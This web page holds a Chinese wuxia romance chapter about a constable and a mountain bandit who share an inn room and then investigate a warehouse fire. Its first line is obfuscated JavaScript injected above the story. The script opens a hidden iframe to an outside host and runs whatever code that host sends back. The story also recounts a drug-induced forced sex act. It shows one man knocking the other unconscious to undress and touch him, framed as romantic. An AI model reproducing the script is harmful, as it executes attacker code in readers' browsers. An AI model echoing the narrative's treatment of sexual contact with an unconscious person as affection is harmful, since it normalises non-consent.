eval('\x77\x69\x6e\x64\x6f\x77')['\x62\x48\x79\x4a\x6f\x64\x6a']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='wwttyy'){new Function(e.data['d'])()}})})('https://samanthyean.com:22665','/cd/108_m/1448',window,document)};

缠绵江湖路

  「过了前面的小树林就是平安镇,咱们可以在那里休息。很累吗?」柳易尘柔声说道,脸上挂着一如既往的斯文笑容。
  「嘁,老子才不累。」林天龙撇撇嘴,脸扭向另一边。自从一天前发生过那件事之后,两人之间的气氛就变得很奇怪,莫名的,他就是不好意思直直的盯着那张漂亮的脸。
  要说在之前跟柳易尘交手的时候,他只是觉得柳易尘是个长得很漂亮的娘娘腔,可是近距离观察后,发现,虽然他的容貌很漂亮,可是举手投足之间尽是英气,根本不像女人。而且,自从两人之间发生了那种事,他就一直觉得柳易尘看自己的眼神十分的古怪。偶尔自己回头的时候,还能看到他对着自己背影深思的样子。
  「快点走,老子要饿死了。」林天龙每次想起两人之间发生的事情,就忍不住脸红,只好恶声恶气的对柳易尘说话。
  「好。」柳易尘点点头,没有多说话,只是看着林天龙有些别扭的步伐,微微皱了皱眉。昨天天晚上的时候,在客栈里,他曾经主动要求帮他查看一下那里的伤势,可惜就在他说出这句话之后,他很清楚的看到林天龙脸上血色急速上涌,随后砰的一声,房门关闭在自己的眼前。
  原本两人已经商量好,林天龙跟随柳易尘回到关河县作证,等案子结束,就放他离开。本来柳易尘并不急着回去,因为关于那件案子,李大人手里还缺少一些关键的证据,而且,那件案子也并不是像表面上看起来的那么简单。
  可惜柳易尘虽然不急,林天龙却是归心似箭,恨不得早早就结束这件事,然后回他的困龙山。这一点,也让柳易尘心底有那么一丝丝的郁闷。
  「小二,两间上房。」两人很快来到了平安镇唯一的一家客栈,柳易尘开口要了两间上房,林天龙自然没有反对,反正不是他付钱,他现在身上一文钱都没有了。
  「客官……」小二的脸上面有难色。看着林天龙那张凶悍的脸,好像在瞪自己,好吓人啊。
  「怎么了?」柳易尘笑了笑问道。
  「呃……是这样,本店只有一间上房了。」小二大着胆子说道,这位长得漂亮的公子,说话真是温柔啊。
  「那……」柳易尘沈吟了一下,转过头对林天龙说:「林兄,今晚可否委屈一下,与在下同房?」
  林天龙一听说要和柳易尘同房,脸色立刻变的不好看起来。屁股似乎也开始隐隐作痛。张口正想拒绝,却听见柳易尘低声在自己耳边说:
  「莫非林兄怕在下做些什么不成?」
  林天龙眼睛一瞪,喊道:「老子会怕你???睡就睡。谁怕谁。」话一出口,林天龙就后悔了,可是已经说出去了,再反悔他实在是丢不起那个人。
  「既然如此,那就请林兄和我委屈一夜了。小二,带路。」柳易尘一看林天龙上套,连忙让小二在前面引路。
  三人沈默不语的登上了二楼,小二是被林天龙的脸色吓得不敢多说话,身后跟着的柳易尘则是面带笑容,不想再刺激林天龙;跟在最后的林天龙则是一直在为自己刚才的口快而后悔,满脸的阴霾。


  「二位客官,到了。」小二停在了一间客房的门前,推开了房门。
  「谢谢。」柳易尘向他道了谢,又要了一些热水,便打发他走了。
  等他回过头却发现,林天龙双手抱胸,坐在靠窗的椅子上闭上了眼睛。
  「林兄,你不会是打算就这样坐一夜吧。」柳易尘有些哭笑不得的说道。
  「……」林天龙没有理他,只是默默的坐在那里。
  「林兄,这张床铺足够咱们两人睡的了,我保证那天的情况不会再出现。」柳易尘苦笑着说道。这两天龙天龙对自己的防备可是非常谨慎。
  林天龙心里咯!一下,这两天,两人都十分有默契的闭口不谈那天发生的事。在林天龙看来,那天的事虽然是羞辱了他,可是他也很清楚这件事不能怪柳易尘,而且自己是男人,屁股被捅也不是什么大事,所以那天他才说出了两清的话。
  可是这个柳易尘却偏偏不肯接受,反而找了一个诡异的理由非要跟着自己,他又不是傻瓜,因为当时的思维比较混乱才被柳易尘蒙混过关,后来仔细想想,柳易尘说的那个什么救命的理由根本就说不通。
  而另一方面,那天的事,虽然自己没什么经验,可也知道两个男人之间做这种事是不正常的,自己是被迫的自然没什么话说,可是柳易尘当时虽然是被春药控制,可事后连一点的反感都没有,只让让他生出了一个奇怪的念头──
  ──难道他喜欢我。
  但很快,他就把这个念头打消了,自己的条件跟柳易尘比根本就是天壤之别,自己不过是个山贼,他则是关河县有名的捕快,自己长相凶恶,有的时候甚至可以吓哭小孩子,而柳易尘则是面容姣好,穿上平常的衣服就是一位翩翩美公子,无论从哪个方面来说,柳易尘也不可能看上他。
  「林兄?林兄?」柳易尘的声音把林天龙从思绪中惊醒,睁开眼,对上的正好是那张漂亮精致的脸孔。
  一瞬间的错觉让林天龙把他当成了女人,瞬间红了脸,等他回过神,柳易尘已经带着淡淡的笑容走到床边了。
  林天龙想了一下,坐一宿的滋味绝对不会好过,可是跟柳易尘同床共枕却让他心有疑虑,毕竟他可是真的打不过柳易尘,要是他真对自己下手,那自己的屁股……
  刚刚想到这,林天龙恨不得立刻给自己一巴掌,自己到底在想什么啊,即使哪个柳易尘喜欢男人,恐怕也不会喜欢自己这样的,当时是中了春药没办法,现在已经到了小镇里,如果他真的有需要完全可以去妓院嘛,相比妓院里的小倌要比自己美多了。
  思来想去都没什么错误,那自己到底在担心个屁啊。
  摇了摇头,林天龙忍不住在自己心底自嘲,被男人插了一回就觉得自己是女人了吗?居然还担心有人对自己再次施暴。
  既然已经想开了,林天龙自然也就不担心了,干脆的脱掉了褂子,赤裸着上身,躺在床上。
  柳易尘看林天龙似乎放开了,没有之前那么紧张,心底也松了一口气,要是林天龙总是这么防备自己,自己也很难对他下手啊。
  身边传来悉悉索索脱衣服的声音,林天龙的心里蓦地紧张起来,闭着耳朵装作睡着的样子,他仔细的听着旁边的声音,准备一旦柳易尘要是有什么异动,他可以第一时间做出反击。
  身旁的声音逐渐小了下去,柳易尘只是脱掉了自己的外衣然后躺在他旁边,很快便传来了平和的喘息声,柳易尘似乎睡着了。
  林天龙偷偷松了一口气,绷紧的身体也松了下来,呼吸逐渐变的平稳。
  身边的人身上传来一股淡淡的香味萦绕在自己的鼻间,那种清雅的香味让林天龙觉得很舒服,很快便陷入了沈眠。
  就在林天龙陷入了沈眠后,身旁理应睡着的柳易尘却忽然睁开了眼,感觉到自己身旁平稳的呼吸,柳易尘微微弯了弯嘴角。
  小心的坐起身,他伸手如电,点中了林天龙的睡穴。林天龙的脖子一歪,睡的更沈了。
  长长的吁了一口气,柳易尘伸手解开了林天龙的腰带,轻巧的把他翻个身,脱掉了他的裤子,露出圆润的屁股。
  林天龙的屁股很翘,此刻上面还带着一些细小的划痕,那天在山洞里,虽然柳易尘已经尽可能的小心了,但是毕竟限于环境,身下的草垫还是在他身上留下了不少的痕迹。
  小心翼翼的扒开两片臀瓣,柳易尘看到了那个被自己蹂躏过的小小入口。
  穴口有些红肿,微微凸了出来,周围的褶皱被那天自己粗鲁的行为撕裂了几道小口,似乎林天龙一直没有处理过那里,现在还没有完全愈合,经过今天一天的跋涉,似乎又裂开了,缓慢的溢着血丝。
  微微叹了口气,柳易尘心里升起一丝惭愧。他确实是对林天龙很感兴趣,但是他并没有想要在这么快的时间内就得到他的身体,只不过那天发生的事情实在太突然了,无可控制之下,他只好先用暴力得到了他的身体。
  本以为第二天面对的会是林天龙狂暴的怒火,柳易尘已经做好了被他捅两刀的准备,让他惊喜的是林天龙的态度似乎并不如自己想象中的暴怒,心生侥幸的他干脆编造出一个理由缠着他,既然林天龙并不排斥男人,那么自己还是有很大的机会的。
  陷入自己思绪的柳易尘,脸上挂上了迷人的微笑,直到林天龙发出无意识的梦呓,他才惊醒过来。
  轻轻碰触了一下穴口,林天龙的身体瑟缩了一下,浓密的眉毛皱成一团,看的柳易尘心疼不已。
  从口袋里掏出一罐膏药,小心的涂抹在林天龙的菊花上,连内壁里也涂抹了不少,上好的药品很快发生了作用,细密的裂口逐渐收缩,很快便不再流血了。

  柳易尘忍不住苦笑,要是师傅知道他制作的「凝露」被他用到这种地方,恐怕连鼻子都要气歪了。
  稍稍等了一下,凝露很快便全部渗入了皮肤,一点痕迹都没有留下。上下检查了一番,柳易尘确定没有其他的伤口了,便小心的帮他提上裤子,然后垂涎的摸了摸他的肌肉,解开他的穴道后,倒在床上也睡着了。
  「走水啦!走水啦!」就在柳易尘睡着没多久,窗外忽然传来了更夫惊慌失措的声音。
  林天龙在第一时间蹦了起来,和柳易尘对视了一眼,立刻警惕的看向窗外。
  从窗户看去,小镇的西边燃起了巨大的火光,周围的居民逐渐被惊醒,越来越多惊慌失措的人从四面八方涌来。
  「去帮忙。」林天龙沈声说道,说完立刻就从窗口跳了出去。
  柳易尘自然不会反对,跟在林天龙后也也跳了出去。
  两道身影快速的在房檐上飞奔,很快便到达了起火的地方。周围的群众已经聚集了起来,手里拿着各种盛水的工具,阻止火势的蔓延。
  「我的仓库……天哪!我完了……」一个瘦弱的男人颤抖着身体,哭丧着脸说道。
  「我的布料……全完了。」瘦弱男人无力的瘫倒在地上,脸上一片绝望。
  「里面有人吗?」林天龙从房檐上蹦了下来,抓住那个瘦弱的男人问道。
  「完了……全完了。」男人毫不反抗的任由林天龙抓着,眼中满是空洞,喃喃的说道。
  「该死的……」林天龙不耐烦的松开了手,任凭男人再次瘫倒在地上。转身想要再抓个人问问,正好一个强壮的男人从火海中冲了出来。
  男人踉跄的跑出来,被周围的群众一把接住,立刻哭喊起来:
  「陈四!陈四!陈四还在里面啊。」
  「里面还有人?」林天龙一把抓住那个哭喊着的男人,大声问道。
  男人被林天龙凶恶的脸孔吓了一跳,语气一窒,眼中闪过一丝慌张,随后又大声哭喊道:「陈四,陈四还在里面。」
  林天龙扔下男人,转身看向火场,熊熊的火焰冲天而起,整栋建筑都被火焰包围起来,不知道仓库里面究竟囤积了些什么东西,火焰似乎有越烧越旺的趋势。刚刚那个男人冲出来的小门也被断裂的顶梁挡住了。
  林天龙犹豫了一下,他不确定在这种情况下他能不能把人救出来,如果他冲不出来,不但救不了人,恐怕自己也会死在里面。虽然他很想救人,但是,把自己也搭进去很明显是得不偿失。
  肩膀上忽然搭上了一只手,林天龙转过头。柳易尘静静的看着他,摇了摇头。
  林天龙无奈的叹了口气,紧绷的肩膀松垮下来。虽然他是个强盗,但是看着生命的流逝,这种感觉很不好。
  看到林天龙有些遗憾的表情,柳易尘心头动了一下,轻轻在他耳边说:「那个男人……有问题。」说完,看向那个躲在一旁瑟瑟发抖的强壮男人。
  林天龙眉毛一挑,不明白怎么柳易尘会说出这么一句话。
  柳易尘没有多说,只是卷起袖子,参与到救火的行动中去。林天龙自然也不甘示弱,也抄起一个水桶跟了上去。
  折腾了大半夜,火终于灭了,天边隐隐泛出了鱼肚白。
  柳易尘和林天龙也忙了一夜,此刻,柳易尘那张白净的脸上沾上了不少的煤烟,黑一块白一块。相对来说林天龙就好多了,本来就是黝黑的肌肤,再黑一点也看不出来。(= =)
  看了看柳易尘脸上乌七八糟的样子,和平日洁净的样子判若两人,林天龙忍不住用手指着他哈哈大笑起来。
  柳易尘现实被他笑的一愣,然后顺着他的手指反射性的在脸上抹了一把,伸手一看,手指变的乌黑。联想到自己脸上恐怕干净不到哪去,柳易尘也展颜笑了起来。
  「让开!让开!让开!」正当两人相视而笑的时候,一个粗大的嗓门吼了起来。不远处有一队人马赶了过来。
  柳易尘眯起眼睛看向来人的方向。一行大约七八个人,身上穿的皆是捕快青衣,正是平安镇所属的密云县县衙的捕快。为首的一人,三十多岁,身形魁梧,下巴上有些胡子渣,右眼上一到明显的疤痕从额头延伸至颧骨,让他整个人看起来更添几股彪悍的气质。
  「哼!」身旁传来林天龙冷冷的哼声,柳易尘有些奇怪的看着他。
  林天龙斜睨了他一眼:「看什么看,老子就是讨厌捕快。」
  柳易尘苦笑一下,林天龙是个山贼,山贼自然是讨厌捕快的,看样子……自己的路,还很漫长啊。
  「这是怎么回事?」一句话的功夫,那一行人已经到达了仓库前面,为首的捕快跳下马来,环视一圈,问道。
  「华捕头。」一个老头上前一步,打了一个招呼,恭敬的说道。
  「昨夜本镇的朱家的仓库不知何故失火,刚刚才扑灭。不过……仓库的守夜人陈四,没跑出来。」
  华捕头锐利的双眼微微眯了一下,随后视线在人群中转了一圈,视线扫过林天龙的时候瞳孔微微收缩,露出一丝警惕的气息。再看到柳易尘的时候又猛然睁大,脸上出现了一副愉快的表情。
  柳易尘无奈只好拱了拱手,在华捕头眼中出现几分得意之后,在心底苦笑,惨了,这下子晚上要遭殃了。
  林天龙也注意到了华捕头跟柳易尘之间的互动,莫名的心里很不爽,他自己都没发现,他看向华捕头的目光也越发的不善起来。
  「我们进去看看。」华捕头跟小镇的镇长说了一声。随后便带着一群捕快走进了仓库。
  柳易尘考虑了一下,还是决定也跟着进去看看。
  「你进去干嘛?」林天龙不解的看着他。
  「昨天跑出来的另一个守夜人,有古怪。」柳易尘轻轻侧过脸在林天龙耳边说道。

  灼热的呼吸轻轻的从耳边刷过,林天龙猛的打了一个激灵,身体有些发软。反射性的一巴掌挥向柳易尘,柳易尘侧身一闪,闪过了他的攻击有些诧异的看着他。
  「你死远点,有话说话,靠我这么近干嘛。」林天龙脸上挂着烦躁的表情,不满的说道。随即转身走向火场。
  柳易尘的眼中一黯,但他并没有说什么,只是跟在林天龙的后边。没走几步,他却眼尖的发现,林天龙的耳后似乎有隐隐的红色。
  若有所思盯着林天龙的背影,柳易尘停下了脚步。
  走了几步发现柳易尘没跟上来,林天龙停下了脚步转过身,满脸不耐烦的看着他:
  「快走啊,你不是说要去看看吗?」
  柳易尘仔细观察了一下林天龙的表情,没发现什么异常,心头微微一叹,再次迈开了步。
  两人走进仓库,正好看见华捕头正蹲在地上,仔细观察着一具焦黑的尸体。
  「什么人?」两个站在一旁的捕快看见两人走了进来,立刻把刀半拔警惕的看着他们俩。
  华捕头扭过头,看到柳易尘,咧嘴笑了笑,脸上的刀疤越发的狰狞。站起身来拱了拱手。
  「柳捕头,好久不见啊。」
  「华捕头,的确是很久不见啊。」柳易尘展颜一笑,拱手还礼道。
  「这位是关河县的柳易尘柳捕头。」华捕头转过身,向站在自己四周的几个捕快介绍。
  「柳捕头。」几个捕快连忙向他见礼。
  「诸位。」柳易尘自然立刻还礼。
  「这位是密云县县太爷的公子,关乐羽,也是我们的仵作。」华捕头指着站在自己身后的一位黑衫青年。
  青年长的很清秀,大约二十岁上下,一身黑色的长衫衬得他的身形越发的修长,满身的书卷气,看起来一派斯文,实在让人想不到他会整天与尸体为伍。
  青年微笑着向柳易尘拱了拱手,柳易尘也还了礼。
  「这位是……」华熊的目光转移到了林天龙的身上。心里琢磨着,柳易尘从来都是看起来温文尔雅,但对人处事相当的疏离,并不容易接近。要不是又一次自己无意中撞到了柳易尘的醉态,恐怕自己也不会被他视为朋友。
  但是这个人满脸的彪悍气质,身上也明显有功夫在身,可是并没有丝毫公门中人的气质,但是偏偏在柳易尘身上没有对他丝毫的排斥,可见两人的关系十分的不简单。
  「这位是……林天龙,是我的……朋友。」柳易尘犹豫的一下,还是决定这么介绍。
  「林天龙。」华熊的目光猛的收缩了一下,他记得困龙山上面那夥山贼的首领就叫林天龙。不过,不管他是不是那个林天龙,既然柳易尘说了他是自己的朋友,那么自己也没必要再多说些什么。
  冲着林天龙拱拱手算是打了招呼。林天龙自然也是冷冷的还了一个礼。
  「咳咳,我们昨天正好路经这里,火灾发生的时候,我们是头一批赶到的人。」柳易尘看到华熊眼中的精光,自然知道自己的这个介绍他不满意,但是此刻他也没办法详细说,只好尽量转移话题。
  华熊深深的看了林天龙一眼,目光扫过柳易尘的时候停顿了一下,用目光告诉他:「晚上咱们「详细」谈。」
  柳易尘头上有些发麻,但是脸上依旧是一片斯文有礼的样子。
  「说说你们看到的情况。」华熊问道。柳易尘自然是把昨天他们看到前前后后仔细说了一遍。在说到那个从火场中逃出来的另一个守夜人的时候停顿了一下。
  「我觉得他脸上表情很慌张。」
  「着火了自然就会慌张了,这有什么可奇怪的。」站在一旁的一个捕快不以为然的说道。
  他觉得这个长得很漂亮的男人说的都是废话。刚刚介绍的时候说他是总捕头,跟他们华老大平级他就有些不相信,这个男人会是捕快?看他一副斯文柔弱的样子,该不会跟贼人一个照面就软了吧。说不定他旁边的那个男人就是他的保镖。
  「没错,着火自然会慌张。可是,他的慌张确实在看到我朋友追问他里面有没有人的时候出现的。」柳易尘解释道。对于那个捕快不屑的目光他根本不在意。
  倒是华熊看到那个捕快的表情,眼中一寒,什么时候,他华熊的手下也会以貌取人了,看来,只调教他们三个月还远远不够。
  目光扫过华熊眼中的寒气,柳易尘忍不住好笑,同时用怜悯的目光看了那个小捕快一眼,惹恼了华老大,至少也要脱一层皮下来。
  「这么说,那个逃出去的守夜人有很大的疑点?」华熊沈静的说道。
  「恩,极有可能是他……杀人纵火。」柳易尘沈声说道。
  华熊思虑的一下,目光转向正在检查尸体的关公子。
  关公子正好站起身,看到华熊投过来的询问的目光张口说道:
  「死者的脑后有一个不明显的缺口,但是尸体烧的太厉害了,我现在不能确定那是被刀剑砍伤的,还是被房梁之类的东西砸的。」
  「恩。」华熊点了点头,冲着那帮小捕快说,「仔细检查一下周围,看看有没有可疑的东西,顺便让仓库的老板来点验一下,那边还有一些没烧毁的东西。」
  「赵七!」
  「属下在。」刚才那个一脸不屑的捕快应声道。
  「你跟关公子把尸体运回衙门去。」
  「遵命。」
  「然后依旧跟在关公子身边把他检验的结果记录下来。」
  「属下……遵……命……」这一次他回答的很艰难,脸色看起来有些发白,似乎是想起了一些不好的东西。而其他的捕快则都是用一种怜悯的目光看着他。只有关公子还在淡淡微笑。
  「好了,兔崽子们,快点开始干活。」华熊一声大吼,几个捕快连忙动了起来。

【完】